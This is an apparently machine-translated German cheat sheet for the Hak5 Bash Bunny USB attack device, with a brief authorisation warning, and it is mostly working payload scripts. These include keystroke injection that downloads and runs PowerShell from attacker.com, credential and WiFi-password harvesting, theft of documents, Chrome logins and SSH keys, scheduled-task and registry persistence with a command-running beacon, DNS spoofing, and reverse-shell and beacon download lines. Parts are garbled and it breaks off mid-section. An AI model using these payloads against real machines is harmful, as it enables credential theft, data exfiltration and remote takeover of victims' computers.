Bash Bunny Cheat Sheet¶
Überblick¶
Das Bash Bunny ist eine Multivektor-USB-Angriffs- und Automatisierungsplattform, die von Hak5 entwickelt wurde. Dieses fortschrittliche physikalische Penetrationstest-Tool kombiniert die Funktionalität mehrerer Angriffsvektoren zu einem einzigen USB-Gerät, so dass es ein wesentliches Werkzeug für Sicherheitsexperten, die physikalische Sicherheitsbewertungen durchführen. Das Bash Bunny kann verschiedene USB-Gerätetypen wie Tastaturen, Netzwerkadapter, serielle Geräte und Massenspeicher emulieren, so dass anspruchsvolle Angriffsszenarien, die traditionelle Sicherheitssteuerungen umgehen können und umfassende Tests der physischen Sicherheitshaltung einer Organisation ermöglichen.
ZEIT Warning: Der Bash Bunny ist ein leistungsstarkes Penetrationstest-Tool, das nur gegen eigene Systeme verwendet werden sollte oder eine ausdrückliche schriftliche Genehmigung zum Testen haben sollte. Unberechtigte Nutzung kann lokale Gesetze und Organisationspolitiken verletzen. Stellen Sie immer eine ordnungsgemäße Genehmigung vor der Durchführung physikalischer Sicherheitsbewertungen sicher.
Hardware Übersicht¶
Gerätespezifikationen¶
```bash
Bash Bunny Mark II Specifications¶
CPU: Quad-core ARM Cortex-A7 @ 900MHz RAM: 512MB DDR3 Storage: 8GB eMMC + MicroSD slot USB: USB 3.0 Type-A connector Network: Gigabit Ethernet adapter Wireless: 802.11 b/g/n WiFi Operating System: Custom Linux distribution Power: Bus-powered via USB Dimensions: 3.5" x 0.75" x 0.5" Weight: 1.2 oz (34g)
LED Status Indicators¶
Blue: Setup mode / Ready Red: Attack mode / Executing payload Green: Finished / Success Yellow: Special function / Warning Purple: Recovery mode ```_
Schaltstellungen¶
```bash
Physical switch positions¶
Position 0: Arming mode (payload development) Position 1: Attack payload 1 Position 2: Attack payload 2
Switch position detection in payloads¶
SWITCH_POSITION=\((cat /sys/class/gpio/gpio*/value) if [ "\)SWITCH_POSITION" = "1" ]; then # Execute payload 1 elif [ "$SWITCH_POSITION" = "2" ]; then # Execute payload 2 fi ```_
Initial Setup und Konfiguration¶
Erstmalige Einrichtung¶
```bash
1. Connect Bash Bunny to computer¶
2. Set switch to position 0 (arming mode)¶
3. Wait for blue LED (setup mode)¶
4. Access via SSH or serial console¶
Default SSH credentials¶
ssh root@172.16.64.1
Password: hak5bunny¶
Default serial console (if SSH unavailable)¶
Use terminal emulator: 115200 baud, 8N1¶
screen /dev/ttyACM0 115200 ```_
Netzwerkkonfiguration¶
```bash
Configure WiFi (if available on Mark II)¶
wifi_connect() \\{ WIFI_SSID="YourNetwork" WIFI_PASS="YourPassword"
# Configure WiFi
cat > /etc/wpa_supplicant/wpa_supplicant.conf << EOF
network=\\{ ssid="\(WIFI_SSID" psk="\)WIFI_PASS" \\} EOF
# Start WiFi
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
dhclient wlan0
\\}
Configure Ethernet bridge¶
configure_ethernet() \\{ # Enable IP forwarding echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure bridge interface
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 usb0
ifconfig br0 up
# Start DHCP server
dnsmasq --interface=br0 --dhcp-range=172.16.64.10,172.16.64.100,12h
\\}
Update system¶
update_system() \\{ # Update package lists apt update
# Upgrade system
apt upgrade -y
# Install additional tools
apt install -y nmap netcat-openbsd curl wget git
\\} ```_
Struktur der Nutzlast¶
```bash
Bash Bunny payload structure¶
/root/udisk/payloads/ ├── switch1/ # Payloads for switch position 1 │ ├── payload.txt # Main payload script │ ├── config.txt # Configuration file │ └── resources/ # Additional resources ├── switch2/ # Payloads for switch position 2 │ ├── payload.txt │ ├── config.txt │ └── resources/ └── library/ # Payload library ├── credentials/ ├── exfiltration/ ├── execution/ ├── recon/ └── persistence/
Create payload directory¶
create_payload() \\{ local switch_pos="\(1" local payload_name="\)2"
mkdir -p "/root/udisk/payloads/switch$\\\\{switch_pos\\\\}"
cd "/root/udisk/payloads/switch$\\\\{switch_pos\\\\}"
# Create basic payload template
cat > payload.txt << 'EOF'
!/bin/bash¶
¶
Title: Custom Payload¶
Description: Description of payload functionality¶
Author: Your Name¶
Version: 1.0¶
Category: Category¶
¶
LED setup¶
LED SETUP
Attack mode configuration¶
ATTACKMODE HID STORAGE
Main payload logic¶
RUN WIN "cmd /c echo Hello World"
LED finish¶
LED FINISH EOF
echo "Payload created: /root/udisk/payloads/switch$\\\\{switch_pos\\\\}/payload.txt"
\\} ```_
Angriffsmodi und USB Emulation¶
HID (Human Interface Device) Modus¶
```bash
Keyboard emulation¶
ATTACKMODE HID
Basic keystroke injection¶
RUN WIN "cmd" DELAY 500 STRING "echo Hello from Bash Bunny" ENTER
Advanced keystroke sequences¶
RUN WIN "r" DELAY 500 STRING "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" ENTER DELAY 1000 STRING "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" ENTER
Special key combinations¶
CTRL ALT DELETE ALT F4 CTRL SHIFT ESC WIN BREAK ```_
Speichermodus¶
```bash
Mass storage emulation¶
ATTACKMODE STORAGE
Configure storage image¶
STORAGE_IMAGE="/root/udisk/images/payload.img"
Create storage image¶
create_storage_image() \\{ local image_size="100M" local image_file="/root/udisk/images/custom.img"
# Create image file
dd if=/dev/zero of="$image_file" bs=1M count=100
# Format as FAT32
mkfs.vfat "$image_file"
# Mount and populate
mkdir -p /mnt/storage
mount -o loop "$image_file" /mnt/storage
# Add payload files
cp /root/payloads/* /mnt/storage/
# Unmount
umount /mnt/storage
echo "Storage image created: $image_file"
\\}
Autorun configuration¶
create_autorun() \\{ cat > /mnt/storage/autorun.inf << 'EOF' [autorun] open=payload.exe icon=icon.ico label=USB Drive EOF \\} ```_
Ethernet-Modus¶
```bash
Network adapter emulation¶
ATTACKMODE ETHERNET
Configure network settings¶
configure_ethernet_attack() \\{ # Set IP configuration ifconfig usb0 192.168.1.1 netmask 255.255.255.0
# Start DHCP server
dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure iptables for NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
\\}
DNS spoofing¶
dns_spoof() \\{ # Configure dnsmasq for DNS spoofing cat > /etc/dnsmasq.conf << 'EOF' interface=usb0 dhcp-range=192.168.1.10,192.168.1.100,12h address=/evil.com/192.168.1.1 address=/login.company.com/192.168.1.1 EOF
# Start dnsmasq
dnsmasq -C /etc/dnsmasq.conf
\\} ```_
Serieller Modus¶
```bash
Serial device emulation¶
ATTACKMODE SERIAL
Configure serial parameters¶
configure_serial() \\{ # Set baud rate and parameters stty -F /dev/ttyGS0 115200 cs8 -cstopb -parenb
# Start serial communication
cat /dev/ttyGS0 &
echo "Serial mode configured"
\\}
Serial data capture¶
capture_serial() \\{ local output_file="/root/loot/serial_capture.txt"
# Capture serial data
cat /dev/ttyGS0|tee "$output_file" &
echo "Serial capture started: $output_file"
\\} ```_
zusammengesetzte Moden¶
```bash
Multiple attack modes simultaneously¶
ATTACKMODE HID STORAGE ATTACKMODE HID ETHERNET ATTACKMODE STORAGE ETHERNET ATTACKMODE HID STORAGE ETHERNET
Example: HID + Storage attack¶
composite_attack() \\{ # Configure composite mode ATTACKMODE HID STORAGE
# HID component: Open file explorer
RUN WIN "explorer"
DELAY 1000
# Storage component: Auto-execute payload
# Files on storage device will be accessible
# HID component: Navigate to storage
STRING "E:\\"
ENTER
DELAY 500
STRING "payload.exe"
ENTER
\\} ```_
Entwicklung der Nutzlast¶
Grundlegende Nutzlaststruktur¶
```bash
!/bin/bash¶
¶
Title: Basic Payload Template¶
Description: Template for Bash Bunny payloads¶
Author: Security Researcher¶
Version: 1.0¶
Category: Template¶
¶
Include Bash Bunny library¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED status: Setup¶
LED SETUP
Configure attack mode¶
ATTACKMODE HID
Wait for target to recognize device¶
DELAY 2000
Main payload execution¶
main_payload() \\{ # Open command prompt RUN WIN "cmd" DELAY 500
# Execute commands
STRING "echo Payload executed successfully"
ENTER
# Additional payload logic here
# Clean up
STRING "exit"
ENTER
\\}
Execute main payload¶
main_payload
LED status: Finished¶
LED FINISH
Sync and exit¶
sync ```_
Advanced Payload Techniques¶
Credential Harvesting¶
```bash
!/bin/bash¶
¶
Title: Credential Harvester¶
Description: Harvests stored credentials from target system¶
Author: Security Researcher¶
Version: 1.0¶
Category: Credentials¶
¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
Wait for target recognition¶
DELAY 3000
harvest_credentials() \\{ # Open PowerShell as administrator RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" DELAY 1000
# Create credential harvesting script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download and execute credential harvester
STRING "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/cred-harvest')"
ENTER
DELAY 2000
# Alternative: Use built-in Windows tools
STRING "cmdkey /list > credentials.txt"
ENTER
DELAY 500
# Export WiFi passwords
STRING "netsh wlan show profiles|Select-String 'All User Profile'|ForEach-Object \\\\{\$_.ToString().Split(':')[1].Trim()\\\\}|ForEach-Object \\\\{netsh wlan show profile name=\$_ key=clear\\\\} > wifi_passwords.txt"
ENTER
DELAY 1000
# Copy to Bash Bunny storage
STRING "Copy-Item credentials.txt E:\\"
ENTER
STRING "Copy-Item wifi_passwords.txt E:\\"
ENTER
# Clean up
STRING "Remove-Item credentials.txt, wifi_passwords.txt"
ENTER
STRING "exit"
ENTER
\\}
harvest_credentials LED FINISH sync ```_
Network Reconnaissance¶
```bash
!/bin/bash¶
¶
Title: Network Reconnaissance¶
Description: Performs network discovery and reconnaissance¶
Author: Security Researcher¶
Version: 1.0¶
Category: Reconnaissance¶
¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE ETHERNET
Configure network¶
configure_network() \\{ ifconfig usb0 192.168.1.1 netmask 255.255.255.0 dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h & echo 1 > /proc/sys/net/ipv4/ip_forward \\}
Network reconnaissance¶
network_recon() \\{ local loot_dir="/root/loot/network_recon_\((date +%Y%m%d_%H%M%S)" mkdir -p "\)loot_dir"
# Wait for target to connect
sleep 10
# Get target IP
local target_ip=$(arp -a|grep usb0|awk '\\\\{print $2\\\\}'|tr -d '()')
if [ -n "$target_ip" ]; then
echo "Target connected: $target_ip" > "$loot_dir/target_info.txt"
# Network discovery
nmap -sn 192.168.1.0/24 > "$loot_dir/network_discovery.txt" 2>&1
# Port scan target
nmap -sS -O "$target_ip" > "$loot_dir/target_portscan.txt" 2>&1
# ARP table
arp -a > "$loot_dir/arp_table.txt"
# Network configuration
ifconfig > "$loot_dir/network_config.txt"
# DNS queries
dig @8.8.8.8 company.com > "$loot_dir/dns_queries.txt" 2>&1
echo "Network reconnaissance completed: $loot_dir"
else
echo "No target connected" > "$loot_dir/error.txt"
fi
\\}
configure_network network_recon LED FINISH sync ```_
Daten Exfiltration¶
```bash
!/bin/bash¶
¶
Title: Data Exfiltration¶
Description: Exfiltrates sensitive data from target system¶
Author: Security Researcher¶
Version: 1.0¶
Category: Exfiltration¶
¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
DELAY 3000
exfiltrate_data() \\{ # Open PowerShell RUN WIN "powershell -WindowStyle Hidden" DELAY 1000
# Create exfiltration script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Search for sensitive files
STRING "\$files = Get-ChildItem -Path C:\\ -Recurse -Include *.txt,*.doc,*.docx,*.pdf,*.xls,*.xlsx -ErrorAction SilentlyContinue|Where-Object \\\\{\$_.Length -lt 10MB\\\\}"
ENTER
DELAY 1000
# Create archive
STRING "Compress-Archive -Path \$files -DestinationPath sensitive_data.zip -Force"
ENTER
DELAY 5000
# Copy to Bash Bunny
STRING "Copy-Item sensitive_data.zip E:\\"
ENTER
DELAY 2000
# Search for browser data
STRING "\$chrome_path = \"\$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\""
ENTER
STRING "if (Test-Path \$chrome_path) \\\\{ Copy-Item \"\$chrome_path\\Login Data\" E:\\chrome_logins.db -Force \\\\}"
ENTER
DELAY 1000
# Search for SSH keys
STRING "\$ssh_path = \"\$env:USERPROFILE\\.ssh\""
ENTER
STRING "if (Test-Path \$ssh_path) \\\\{ Copy-Item \$ssh_path E:\\ssh_keys -Recurse -Force \\\\}"
ENTER
DELAY 1000
# Clean up
STRING "Remove-Item sensitive_data.zip -Force"
ENTER
STRING "exit"
ENTER
\\}
exfiltrate_data LED FINISH sync ```_
Persistenzmechanismus¶
```bash
!/bin/bash¶
¶
Title: Persistence Mechanism¶
Description: Establishes persistence on target system¶
Author: Security Researcher¶
Version: 1.0¶
Category: Persistence¶
¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
DELAY 3000
establish_persistence() \\{ # Open PowerShell as administrator RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" DELAY 1000
# Create persistence script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download payload from Bash Bunny
STRING "Copy-Item E:\\persistence.ps1 .\\"
ENTER
DELAY 1000
# Create scheduled task for persistence
STRING "\$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1'"
ENTER
DELAY 500
STRING "\$trigger = New-ScheduledTaskTrigger -AtLogOn"
ENTER
DELAY 500
STRING "\$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden"
ENTER
DELAY 500
STRING "Register-ScheduledTask -TaskName 'SystemUpdate' -Action \$action -Trigger \$trigger -Settings \$settings -Force"
ENTER
DELAY 1000
# Registry persistence
STRING "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'SystemUpdate' -Value 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1' -Force"
ENTER
DELAY 500
# Copy persistence script to system
STRING "Copy-Item persistence.ps1 C:\\Windows\\Temp\\ -Force"
ENTER
DELAY 500
# Set hidden attribute
STRING "Set-ItemProperty -Path C:\\Windows\\Temp\\persistence.ps1 -Name Attributes -Value Hidden"
ENTER
DELAY 500
# Clean up
STRING "Remove-Item persistence.ps1 -Force"
ENTER
STRING "exit"
ENTER
\\}
Create persistence payload file¶
create_persistence_payload() \\{ cat > /root/udisk/payloads/switch1/persistence.ps1 << 'EOF'
Persistence payload¶
while ($true) \\{ try \\{ # Beacon home $response = Invoke-WebRequest -Uri "http://attacker.com/beacon" -Method POST -Body "alive" -UseBasicParsing
# Execute commands if available
if ($response.Content -ne "ok") \\\\{
Invoke-Expression $response.Content
\\\\}
\\\\} catch \\\\{
# Silent failure
\\\\}
# Sleep for 1 hour
Start-Sleep 3600
\\} EOF \\}
create_persistence_payload establish_persistence LED FINISH sync ```_
Automatisierungsskripte¶
System zur Verwaltung von Nutzlasten¶
```bash
!/bin/bash¶
Bash Bunny payload management system¶
PAYLOAD_DIR="/root/udisk/payloads" LIBRARY_DIR="/root/udisk/payloads/library" LOOT_DIR="/root/loot"
Function to list available payloads¶
list_payloads() \\{ echo "[+] Available payloads:" echo ""
echo "Switch Position 1:"
if [ -f "$PAYLOAD_DIR/switch1/payload.txt" ]; then
local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch1/payload.txt"|cut -d: -f2|xargs)
local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch1/payload.txt"|cut -d: -f2|xargs)
echo " Title: $title"
echo " Description: $desc"
else
echo " No payload configured"
fi
echo ""
echo "Switch Position 2:"
if [ -f "$PAYLOAD_DIR/switch2/payload.txt" ]; then
local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch2/payload.txt"|cut -d: -f2|xargs)
local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch2/payload.txt"|cut -d: -f2|xargs)
echo " Title: $title"
echo " Description: $desc"
else
echo " No payload configured"
fi
echo ""
echo "Library payloads:"
find "$LIBRARY_DIR" -name "*.txt" -type f|while read -r payload; do
local title=$(grep "^# Title:" "$payload"|cut -d: -f2|xargs)
local category=$(grep "^# Category:" "$payload"|cut -d: -f2|xargs)
echo " $(basename "$payload" .txt): $title ($category)"
done
\\}
Function to install payload¶
install_payload() \\{ local payload_name="\(1" local switch_position="\)2"
if [ -z "$payload_name" ]||[ -z "$switch_position" ]; then
echo "Usage: install_payload <payload_name> <switch_position>"
echo "Example: install_payload credential_harvester 1"
return 1
fi
local source_file="$LIBRARY_DIR/$payload_name.txt"
local dest_dir="$PAYLOAD_DIR/switch$switch_position"
local dest_file="$dest_dir/payload.txt"
if [ ! -f "$source_file" ]; then
echo "[-] Payload not found: $payload_name"
return 1
fi
mkdir -p "$dest_dir"
cp "$source_file" "$dest_file"
echo "[+] Payload installed: $payload_name -> switch position $switch_position"
# Copy any additional resources
local resource_dir="$LIBRARY_DIR/$(dirname "$payload_name")/resources"
if [ -d "$resource_dir" ]; then
cp -r "$resource_dir" "$dest_dir/"
echo "[+] Resources copied"
fi
\\}
Function to create new payload¶
create_payload() \\{ local payload_name="\(1" local category="\)2"
if [ -z "$payload_name" ]||[ -z "$category" ]; then
echo "Usage: create_payload <payload_name> <category>"
echo "Categories: credentials, exfiltration, execution, recon, persistence"
return 1
fi
local category_dir="$LIBRARY_DIR/$category"
local payload_file="$category_dir/$payload_name.txt"
mkdir -p "$category_dir"
cat > "$payload_file" << EOF
!/bin/bash¶
¶
Title: $payload_name¶
Description: Description of payload functionality¶
Author: $(whoami)¶
Version: 1.0¶
Category: $category¶
Created: $(date)¶
¶
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
Configure attack mode¶
ATTACKMODE HID
Wait for target recognition¶
DELAY 2000
Main payload logic¶
main_payload() \\{ # Add your payload logic here RUN WIN "cmd" DELAY 500 STRING "echo Hello from $payload_name" ENTER DELAY 1000 STRING "exit" ENTER \\}
Execute payload¶
main_payload
LED FINISH sync EOF
echo "[+] Payload template created: $payload_file"
echo "[+] Edit the file to implement your payload logic"
\\}
Function to backup payloads¶
backup_payloads() \\{ local backup_dir="/root/payload_backups" local backup_file="\(backup_dir/payloads_backup_\)(date +%Y%m%d_%H%M%S).tar.gz"
mkdir -p "$backup_dir"
tar -czf "$backup_file" -C /root/udisk payloads/
echo "[+] Payloads backed up: $backup_file"
\\}
Function to restore payloads¶
restore_payloads() \\{ local backup_file="$1"
if [ -z "$backup_file" ]||[ ! -f "$backup_file" ]; then
echo "Usage: restore_payloads <backup_file>"
echo "Available backups:"
ls -la /root/payload_backups/*.tar.gz 2>/dev/null||echo "No backups found"
return 1
fi
echo "[+] Restoring payloads from: $backup_file"
tar -xzf "$backup_file" -C /root/udisk/
echo "[+] Payloads restored successfully"
\\}
Function to test payload syntax¶
test_payload() \\{ local switch_position="$1"
if [ -z "$switch_position" ]; then
echo "Usage: test_payload <switch_position>"
return 1
fi
local payload_file="$PAYLOAD_DIR/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
echo "[-] No payload found for switch position $switch_position"
return 1
fi
echo "[+] Testing payload syntax: $payload_file"
# Check bash syntax
bash -n "$payload_file"
if [ $? -eq 0 ]; then
echo "[+] Payload syntax is valid"
else
echo "[-] Payload syntax errors found"
return 1
fi
# Check for required functions
if ! grep -q "LED SETUP" "$payload_file"; then
echo "[!] Warning: LED SETUP not found"
fi
if ! grep -q "LED FINISH" "$payload_file"; then
echo "[!] Warning: LED FINISH not found"
fi
if ! grep -q "ATTACKMODE" "$payload_file"; then
echo "[!] Warning: ATTACKMODE not specified"
fi
\\}
Function to monitor loot¶
monitor_loot() \\{ echo "[+] Monitoring loot directory: $LOOT_DIR"
# Create loot directory if it doesn't exist
mkdir -p "$LOOT_DIR"
# Monitor for new files
inotifywait -m -r -e create,modify "$LOOT_DIR" --format '%w%f %e %T' --timefmt '%Y-%m-%d %H:%M:%S'|while read file event time; do
echo "[$time] $event: $file"
# Automatically compress large files
if [ "$event" = "CREATE" ] && [ -f "$file" ]; then
local file_size=$(stat -c%s "$file")
if [ "$file_size" -gt 10485760 ]; then # 10MB
echo " [+] Compressing large file: $file"
gzip "$file"
fi
fi
done
\\}
Main menu¶
show_menu() \\{ echo "Bash Bunny Payload Management System" echo "====================================" echo "1. List payloads" echo "2. Install payload" echo "3. Create new payload" echo "4. Test payload" echo "5. Backup payloads" echo "6. Restore payloads" echo "7. Monitor loot" echo "8. Exit" echo "" read -p "Select option: " choice
case $choice in
1) list_payloads ;;
2)
read -p "Payload name: " name
read -p "Switch position (1 or 2): " pos
install_payload "$name" "$pos"
;;
3)
read -p "Payload name: " name
read -p "Category: " cat
create_payload "$name" "$cat"
;;
4)
read -p "Switch position (1 or 2): " pos
test_payload "$pos"
;;
5) backup_payloads ;;
6)
read -p "Backup file path: " backup
restore_payloads "$backup"
;;
7) monitor_loot ;;
8) exit 0 ;;
*) echo "Invalid option" ;;
esac
\\}
Command line interface¶
if [ \(# -eq 0 ]; then while true; do show_menu echo "" done else case "\)1" in "list") list_payloads ;; "install") install_payload "\(2" "\)3" ;; "create") create_payload "\(2" "\)3" ;; "test") test_payload "\(2" ;; "backup") backup_payloads ;; "restore") restore_payloads "\)2" ;; "monitor") monitor_loot ;; *) echo "Usage: $0 [command] [args]" echo "Commands: list, install, create, test, backup, restore, monitor" ;; esac fi ```_
Automatisierte Payload Bereitstellung¶
```bash
!/bin/bash¶
Automated payload deployment and execution¶
DEPLOYMENT_CONFIG="deployment.conf" LOG_FILE="/root/logs/deployment.log" RESULTS_DIR="/root/results"
mkdir -p "\((dirname "\)LOG_FILE")" "$RESULTS_DIR"
Function to log messages¶
log_message() \\{ local message="\(1" echo "\)(date '+%Y-%m-%d %H:%M:%S') - \(message"|tee -a "\)LOG_FILE" \\}
Function to deploy payload to switch position¶
deploy_payload() \\{ local payload_name="\(1" local switch_position="\)2" local target_description="$3"
log_message "Deploying payload: $payload_name to switch $switch_position"
log_message "Target: $target_description"
# Install payload
if install_payload "$payload_name" "$switch_position"; then
log_message "Payload deployed successfully"
# Create deployment record
cat > "$RESULTS_DIR/deployment_$\\\\{switch_position\\\\}_$(date +%Y%m%d_%H%M%S).json" << EOF
\\{ "payload_name": "\(payload_name", "switch_position": "\)switch_position", "target_description": "\(target_description", "deployment_time": "\)(date -Iseconds)", "status": "deployed" \\} EOF
return 0
else
log_message "Payload deployment failed"
return 1
fi
\\}
Function to execute payload¶
execute_payload() \\{ local switch_position="\(1" local execution_timeout="\)2"
log_message "Executing payload on switch $switch_position"
# Check if payload exists
local payload_file="/root/udisk/payloads/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
log_message "No payload found for switch $switch_position"
return 1
fi
# Create execution environment
local execution_dir="/tmp/payload_execution_$"
mkdir -p "$execution_dir"
cd "$execution_dir"
# Set timeout
if [ -n "$execution_timeout" ]; then
timeout "$execution_timeout" bash "$payload_file" 2>&1|tee -a "$LOG_FILE"
local exit_code=$?
else
bash "$payload_file" 2>&1|tee -a "$LOG_FILE"
local exit_code=$?
fi
# Clean up
cd /
rm -rf "$execution_dir"
if [ $exit_code -eq 0 ]; then
log_message "Payload execution completed successfully"
else
log_message "Payload execution failed with exit code: $exit_code"
fi
return $exit_code
\\}
Function to collect results¶
collect_results() \\{ local switch_position="\(1" local collection_dir="\)RESULTS_DIR/collection_$(date +%Y%m%d_%H%M%S)"
log_message "Collecting results from switch $switch_position"
mkdir -p "$collection_dir"
# Copy loot
if [ -d "/root/loot" ]; then
cp -r /root/loot/* "$collection_dir/" 2>/dev/null
log_message "Loot collected: $(find "$collection_dir" -type f|wc -l) files"
fi
# Copy storage contents
local storage_mount="/mnt/bunny_storage"
if mountpoint -q "$storage_mount"; then
cp -r "$storage_mount"/* "$collection_dir/" 2>/dev/null
log_message "Storage contents collected"
fi
# Generate collection report
cat > "$collection_dir/collection_report.txt" << EOF
Collection Report¶
Date: $(date) Switch Position: $switch_position Collection Directory: $collection_dir
Files Collected: \((find "\)collection_dir" -type f -exec ls -lh \\{\\} \;|awk '\\{print $9, $5\\}')
Total Size: \((du -sh "\)collection_dir"|cut -f1) EOF
log_message "Results collected in: $collection_dir"
\\}
Function to generate deployment report¶
generate_report() \\{ local report_file="\(RESULTS_DIR/deployment_report_\)(date +%Y%m%d).html"
log_message "Generating deployment report: $report_file"
cat > "$report_file" << 'EOF'
Bash Bunny Deployment Report
Generated: $(date)
Deployment: $payload_name
Switch Position: $switch_pos
Target: $target
Deployment Time: $deploy_time
EOF
log_message "Deployment report generated: $report_file"
\\}
Function to clean up old results¶
cleanup_results() \\{ local retention_days="$1"
if [ -z "$retention_days" ]; then
retention_days=30
fi
log_message "Cleaning up results older than $retention_days days"
# Clean up old deployment files
find "$RESULTS_DIR" -name "deployment_*.json" -mtime +$retention_days -delete
find "$RESULTS_DIR" -name "collection_*" -type d -mtime +$retention_days -exec rm -rf \\\\{\\\\} \;
# Clean up old logs
find "$(dirname "$LOG_FILE")" -name "*.log" -mtime +$retention_days -delete
log_message "Cleanup completed"
\\}
Main deployment workflow¶
main_deployment() \\{ local config_file="$1"
if [ ! -f "$config_file" ]; then
log_message "Configuration file not found: $config_file"
return 1
fi
log_message "Starting automated deployment workflow"
# Read configuration
source "$config_file"
# Deploy payloads
for i in $(seq 1 2); do
local payload_var="PAYLOAD_SWITCH_$i"
local target_var="TARGET_SWITCH_$i"
local timeout_var="TIMEOUT_SWITCH_$i"
local payload_name="$\\\\{!payload_var\\\\}"
local target_desc="$\\\\{!target_var\\\\}"
local timeout="$\\\\{!timeout_var\\\\}"
if [ -n "$payload_name" ]; then
if deploy_payload "$payload_name" "$i" "$target_desc"; then
# Wait for manual execution or auto-execute
if [ "$AUTO_EXECUTE" = "true" ]; then
sleep 5 # Allow time for deployment
execute_payload "$i" "$timeout"
collect_results "$i"
fi
fi
fi
done
# Generate report
generate_report
# Cleanup if configured
if [ "$AUTO_CLEANUP" = "true" ]; then
cleanup_results "$RETENTION_DAYS"
fi
log_message "Automated deployment workflow completed"
\\}
Create default configuration¶
create_default_config() \\{ cat > "$DEPLOYMENT_CONFIG" << 'EOF'
Bash Bunny Deployment Configuration¶
Payload assignments¶
PAYLOAD_SWITCH_1="credential_harvester" PAYLOAD_SWITCH_2="network_recon"
Target descriptions¶
TARGET_SWITCH_1="Windows 10 workstation - Finance department" TARGET_SWITCH_2="Ubuntu server - Development environment"
Execution timeouts (seconds)¶
TIMEOUT_SWITCH_1=300 TIMEOUT_SWITCH_2=600
Automation settings¶
AUTO_EXECUTE=false AUTO_CLEANUP=true RETENTION_DAYS=30 EOF
log_message "Default configuration created: $DEPLOYMENT_CONFIG"
\\}
Command line interface¶
case "\(1" in
"deploy")
deploy_payload "\)2" "\(3" "\)4"
;;
"execute")
execute_payload "\(2" "\)3"
;;
"collect")
collect_results "\(2"
;;
"report")
generate_report
;;
"cleanup")
cleanup_results "\)2"
;;
"workflow")
main_deployment "$2"
;;
"config")
create_default_config
;;
*)
echo "Usage: $0 [command] [args]"
echo "Commands:"
echo " deploy
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Generate Metasploit payloads for Bash Bunny¶
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /root/udisk/payloads/switch1/payload.exe
Bash Bunny payload to execute Metasploit payload¶
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF' ATTACKMODE HID STORAGE DELAY 3000 RUN WIN "E:\payload.exe" EOF ```_
Integrieren der Welt¶
```bash
Generate Empire stager for Bash Bunny¶
In Empire console:¶
(Empire) > usestager windows/launcher_bat¶
(Empire: stager/windows/launcher_bat) > set Listener http¶
(Empire: stager/windows/launcher_bat) > generate¶
Copy generated stager to Bash Bunny storage¶
cp empire_stager.bat /root/udisk/payloads/switch1/ ```_
Cobalt Strike Integration¶
```bash
Generate Cobalt Strike beacon for Bash Bunny¶
In Cobalt Strike:¶
Attacks -> Packages -> Windows Executable (S)¶
Save as beacon.exe¶
Bash Bunny payload for Cobalt Strike¶
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF' ATTACKMODE HID STORAGE DELAY 3000 RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& \\{(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.100/beacon.exe', 'C:\Windows\Temp\beacon.exe'); Start-Process 'C:\Windows\Temp\beacon.exe'\\}\"" EOF ```_
Fehlerbehebung¶
Gemeinsame Themen¶
Gerät nicht erkannt¶
```bash
Check USB connection¶
lsusb|grep "Hak5"
Reset USB subsystem¶
echo 0 > /sys/bus/usb/devices/usb1/authorized echo 1 > /sys/bus/usb/devices/usb1/authorized
Check dmesg for errors¶
dmesg|tail -20 ```_
Payload Nicht ausführen¶
```bash
Check payload syntax¶
bash -n /root/udisk/payloads/switch1/payload.txt
Check file permissions¶
chmod +x /root/udisk/payloads/switch1/payload.txt
Test payload manually¶
cd /root/udisk/payloads/switch1/ bash payload.txt ```_
LED-Leuchten Nicht arbeiten¶
```bash
Check LED control¶
echo "LED SETUP" > /dev/ttyGS0 echo "LED FINISH" > /dev/ttyGS0
Reset LED controller¶
systemctl restart led-controller ```_
Speichermodus-Ausgaben¶
```bash
Check storage image¶
file /root/udisk/images/payload.img
Mount storage image manually¶
